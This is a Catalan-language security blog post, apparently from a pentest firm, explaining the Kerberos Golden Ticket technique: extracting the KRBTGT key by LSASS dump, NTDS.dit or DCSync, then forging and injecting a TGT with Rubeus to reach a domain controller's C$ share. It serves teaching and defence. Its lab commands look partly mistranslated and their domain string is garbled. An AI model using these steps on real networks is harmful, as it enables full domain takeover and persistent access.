Tickets Kerberos

Entrades Kerberos

Celia Catalán


Avui parlarem sobre una de les diferents tècniques que solem dur a terme sobre pentest intern

Quan un atacant aconsegueix comprometre un domini després d'assolir privilegis alts, com per exemple Domain Admin o Enterprise Admin, és molt difícil per a una organització recuperar el control total del bosc i considerar-lo 100% net.

Els atacants amb aquest accés poden fer ús dels seus alts privilegis per extreure credencials especials del domini i fer-les servir per guanyar persistència, podent tornar a obtenir accessos com qualsevol usuari en qualsevol moment. Aquestes credencials es modifiquen rarament o fins i tot no es modifiquen mai, cosa que atorga als atacants un accés pràcticament il·limitat.

Al llarg de diferents publicacions, veurem algunes d'aquestes tècniques de persistència, les quals es basen en l'ús de tiquets de Kerberos.

BILLET D'OR

Un atac Golden Ticket consisteix en crear un Ticket Granting Ticket (TGT) legítim que es fa passar per qualsevol usuari mitjançant l'ús del hash NTLM del compte KRBTGT d'Active Directory. Aquesta tècnica és particularment poderosa, ja que permet accedir a qualsevol servei o màquina dins del domini com l'usuari suplantat. És fonamental recordar que les credencials del compte KRBTGT mai no s'actualitzen automàticament.

Per adquirir el hash NTLM del compte KRBTGT, es poden emprar diversos mètodes:

  • Es pot extreure de la memòria, fent un bolcat del procés LSASS (Local Security Authority Subsystem Service) d'un Controlador de Domini.
  • També es pot extreure del fitxer de serveis de directori NT (NTDS.dit) ubicat a qualsevol Controlador de Domini.
  • O bé es pot obtenir després d'executar un atac DCsync, que es pot fer utilitzant eines com Mimikatz o l'script secretsdump.py d'Impacket.

És important esmentar que, per fer aquestes operacions, normalment es requereixen privilegis de Domain Admin o un nivell similar d'accés (auth/system). Per aquesta raó, els Golden Tickets són utilitzats per fer moviments laterals per la resta del domini, així com establir persistència i no per a l'escalada de privilegis.

Igual que en el cas de Silver Ticket, encara que el hash NTLM serveix com a mètode viable per a aquest propòsit, es recomana l'execució d'aquest atac utilitzant les claus AES (Advanced Encryption Standard) de Kerberos per raons de seguretat operativa i ser menys detectable .

Impacte

Un Golden Ticket permet accés il·limitat i persistent a qualsevol recurs dins del domini fins que la clau KRBTGT es canviï, cosa que pot ser un procés complex i disruptiu.

Explotació

Per a aquest escenari, partim de la base d'un domini compromès, on tenim credencials de Domain Admin i hem aconseguit fer la tècnica de DCSync, obtenint així les claus de Kerberos del compte KRBTGT.

Creació del tiquet

Per crear el Golden Ticket, podem fer ús de l'eina Rubeus i executar la següent ordre:

Rubeus.exe golden /aes256: 42a38fe97bcf9c48190e5d77e48faa7d95b7fed838c8910845a86d66d78f188a /usuari:Eddard.stark /domain:north.sevenkingdoms:-1515-2-2-153-2-2-2 86379517-4083755373 /nowrap


  • Aes256: Clau aes256 del compte KRBTGT extret anteriorment
  • User: Usuari a impersonalitzar, en aquest cas un Domain Admin
  • Domain: Nom del domini
  • Sid: SID del domini

Importar el tiquet

Un cop obtingut el tiquet, podem comprovar que no tenim accés mitjançant SMB al controlador de domini.

ls \\hivernacle\c$



Per guanyar accés, primer importem el tiquet a la nostra sessió. Podem fer ús de Rubeus de nou per aconseguir-ho:

Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:NORTH /nom d'usuari:Eddard.stark /contrasenya:PassFake /ticket: doIGDCCBgigAwI[…]tcy5sb2NhbA==



  • Program: Comanda a executar on s'injectarà el tiquet
  • Domain: Nom del domini
  • Username: Usuari del domini
  • Password: Contrasenya de l'usuari. No cal conèixer la contrasenya real de l'usuari
  • Tiquet: El tiquet creat anteriorment

Un cop importat el tiquet, podem accedir al DC.

ls \\hivernacle\c$



Us deixem certs aspectes que cal tenir en compte quan pensem en la possibilitat d'un Golden Ticket.



Credencials Necessàries

Característica Bitllet d'Or
Objectiu Accés a tot el domini
Credencials Necessàries Administrador de domini o KRBTGT
Impacte Accés il·limitat al domini
Complexitat de l'atac Alta
Contramesures Clau Protecció de KRBTGT, monitorització exhaustiva


I fins aquí de tiquets i no precisament de fira, ens veiem a la propera entrega.

Álvaro Temes , Analista de ciberseguretat a Zerolynx .
Tornar al bloc

Deixa un comentari

Tingueu en compte que els comentaris s'han d'aprovar abans que es publiquin.